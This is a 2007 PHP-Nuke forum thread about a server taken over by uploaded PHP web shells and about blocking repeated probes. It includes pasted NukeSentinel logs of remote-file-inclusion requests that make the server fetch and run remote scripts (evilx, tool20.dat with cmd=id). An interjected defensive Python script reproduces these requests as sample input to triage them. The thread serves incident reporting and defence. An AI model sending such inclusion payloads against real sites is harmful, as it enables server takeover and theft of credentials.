Ravens PHP Scripts: Forums
 

 

Ravens PHP Scripts And Web Hosting Forum Index -> Hack Attempt Script
killerskippy
New Member
Joined: Jun 12, 2007
Posts: 2

Posted: Tue Jun 26, 2007 6:07 pm

My site and one of our servers got taken over via a code issue allowing PHP files to be uploaded via the thumbnail upload with a submitted video.

This was fixed the same day by the admin at Nuke Video once I reported it and gave logs, but I figured I would post here so if anyone is using the script they know to grab the patch.

They uploaded a couple of files, one main one that gave them access to the server and all root/user passwords for the server, along with database access etc.


36_rachid.php

.r57shell.php

The server is now back in our control and has been formatted and completely reloaded, and all new security has been added to the PHP-Nuke website.

What I don't understand is why Sentinel didn't block them. I had set all IP addresses from Russia and Morocco to be blocked, and the IP addresses found in the httpd_access_log file on the server are from within the ranges I blocked.

I added this to my .htaccess file also:

RedirectMatch r57shell.php http://www.mydomain.com
RedirectMatch rachid.php http://www.mydomain.com


Can anyone tell me how to block a whole country?

I'm really over being hacked and the attempts, so I wish to just block all IPs from RU.

I receive many emails every day saying someone from an IP in RU was blocked, and they all seem to include this:


Date & Time: 2007-06-26 20:26:26 EST GMT +1000 Blocked IP: 216.117.141.102 User ID: Visitor (1)
Reason: Abuse-Filter
--------------------
User Agent: libwww-perl/5.65
Query String: www.mydomain.com.au/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://80.201.236.78/~pat/evilx?
Get String: www.mydomain.com.au/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://80.201.236.78/~pat/evilx?
Post String: www.mydomain.com.au/modules/Forums/admin/admin_styles.php
Forwarded For: none
Client IP: none
Remote Address: 216.117.141.102
Remote Port: 55123
Request Method: GET

Or

Date & Time: 2007-06-27 04:54:44 EST GMT +1000 Blocked IP: 85.98.179.220 User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)
Query String: www.mydomain.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://englishforbusinessonline.com/tool20.dat?&list=1&cmd=id
Get String: www.mydomain.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://englishforbusinessonline.com/tool20.dat?&list=1&cmd=id
Post String: www.mydomain.com/modules/Forums/admin/admin_styles.php
Forwarded For: none
Client IP: none
Remote Address: 85.98.179.220
Remote Port: 4873
Request Method: GET
Cheers
KillerSkippy
 
evaders99
Former Moderator in Good Standing
Joined: Apr 30, 2004
Posts: 3221

Posted: Tue Jun 26, 2007 8:43 pm

Did Sentinel write any of the Russian IP ranges to the banned list in .htaccess?

You can block all the libwww-perl attacks using .htaccess; it's referenced in a previous thread. I've seen usage of Mozilla/4.0 before, but I am unaware whether this is truly an automated bot or just a bad hacker.

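The notices quoted in the first post and the libwww-perl suggestion in the reply above both come down to two questions a defender wants answered quickly: is the blocked request a remote-file-inclusion probe (a URL handed to phpbb_root_path), and does its source address actually fall inside one of the ranges the admin thinks are already blocked? The following Python script is an added example, not code from this thread, NukeSentinel or Nuke Video. The notice layout copies the fields shown above; the hostnames in the query strings, the block ranges and the third (non-RFI) notice are constructed, and the Apache 2.2 Deny directives at the end assume that is the dialect the site's .htaccess uses.

```python
"""Triage NukeSentinel-style block notices for remote-file-inclusion (RFI)
attempts and check whether each source address is covered by the block
ranges the administrator configured.

Added example; not part of the forum thread or of NukeSentinel/Nuke Video.
Hosts, block ranges and the third notice below are constructed."""
import ipaddress
import re
from urllib.parse import parse_qs

# Constructed notices modelled on the ones quoted in the thread. The hosts in
# the query strings are placeholders, not real attacker infrastructure.
SAMPLE_NOTICES = """\
Date & Time: 2007-06-26 20:26:26 EST GMT +1000 Blocked IP: 216.117.141.102 User ID: Visitor (1)
Reason: Abuse-Filter
--------------------
User Agent: libwww-perl/5.65
Query String: www.example.com.au/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://rfi-host.example/~pat/evilx?
Remote Address: 216.117.141.102
Request Method: GET

Date & Time: 2007-06-27 04:54:44 EST GMT +1000 Blocked IP: 85.98.179.220 User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)
Query String: www.example.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://rfi-host.example/tool20.dat?&list=1&cmd=id
Remote Address: 85.98.179.220
Request Method: GET

Date & Time: 2007-06-27 09:12:00 EST GMT +1000 Blocked IP: 192.0.2.7 User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: Mozilla/5.0 (X11; Linux i686)
Query String: www.example.com/modules/Forums/viewtopic.php?t=12&start=0
Remote Address: 192.0.2.7
Request Method: GET
"""

# Constructed: the ranges the administrator believes are already blocked.
BLOCKED_RANGES = [ipaddress.ip_network(n) for n in ("216.117.0.0/16", "85.96.0.0/13")]

# A parameter value that is itself a remote URL is the signature of an RFI probe.
RFI_VALUE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)
# User-agent prefixes the reply above suggests treating as automated clients.
AUTOMATED_AGENTS = ("libwww-perl",)


def parse_notices(text):
    """Split a mail digest into notices (separated by blank lines) and pull
    out the fields needed for triage; missing fields become empty strings."""
    notices = []
    for chunk in re.split(r"\n\s*\n", text.strip()):
        fields = {}
        for key in ("User Agent", "Query String", "Remote Address", "Reason"):
            m = re.search(rf"^{key}:\s*(.*)$", chunk, re.MULTILINE)
            fields[key] = m.group(1).strip() if m else ""
        notices.append(fields)
    return notices


def rfi_parameters(query_string):
    """Return {param: url} for every query parameter whose value is a remote URL."""
    _, _, qs = query_string.partition("?")
    hits = {}
    for name, values in parse_qs(qs, keep_blank_values=True).items():
        for v in values:
            if RFI_VALUE.match(v):
                hits[name] = v
    return hits


def covering_range(addr):
    """Return the configured block range containing addr, or None if no
    range covers it (which is the case the original poster was puzzled by)."""
    ip = ipaddress.ip_address(addr)
    return next((str(n) for n in BLOCKED_RANGES if ip in n), None)


def triage(text=SAMPLE_NOTICES):
    """Classify each notice: RFI parameters, automated client, covering range."""
    results = []
    for n in parse_notices(text):
        ua = n["User Agent"].lower()
        results.append({
            "remote": n["Remote Address"],
            "rfi": rfi_parameters(n["Query String"]),
            "automated": any(ua.startswith(a) for a in AUTOMATED_AGENTS),
            "blocked_range": covering_range(n["Remote Address"]),
        })
    return results


def deny_lines(networks=BLOCKED_RANGES):
    """Apache 2.2 mod_authz_host directives denying the given networks, the
    same style of entry NukeSentinel writes into .htaccess for banned hosts."""
    return ["Order Allow,Deny", "Allow from all"] + [f"Deny from {n}" for n in networks]


if __name__ == "__main__":
    for r in triage():
        print(r)
    print("\n".join(deny_lines()))
```

Running it prints one record per notice; the first two show phpbb_root_path carrying a remote URL, the first is also flagged as libwww-perl, and both sources sit inside a configured range, while the third source is covered by no range at all. That last case is the one worth checking against Sentinel's own block-range list whenever a notice arrives from an address you expected to be banned already.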
killerskippy

Posted: Tue Jun 26, 2007 8:53 pm

evaders99 wrote:
Did Sentinel write any of the Russian IP ranges to the banned list in .htaccess?

You can block all the libwww-perl attacks using .htaccess; it's referenced in a previous thread. I've seen usage of Mozilla/4.0 before, but I am unaware whether this is truly an automated bot or just a bad hacker.


Yes, the IP addresses are added automatically to the .htaccess file, but the range is already set to block in the block range section of Sentinel, so they shouldn't be getting to the site in the first place unless I'm not understanding how it works.

I am searching for the libwww-perl attacks now; I hope that helps.
 
Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 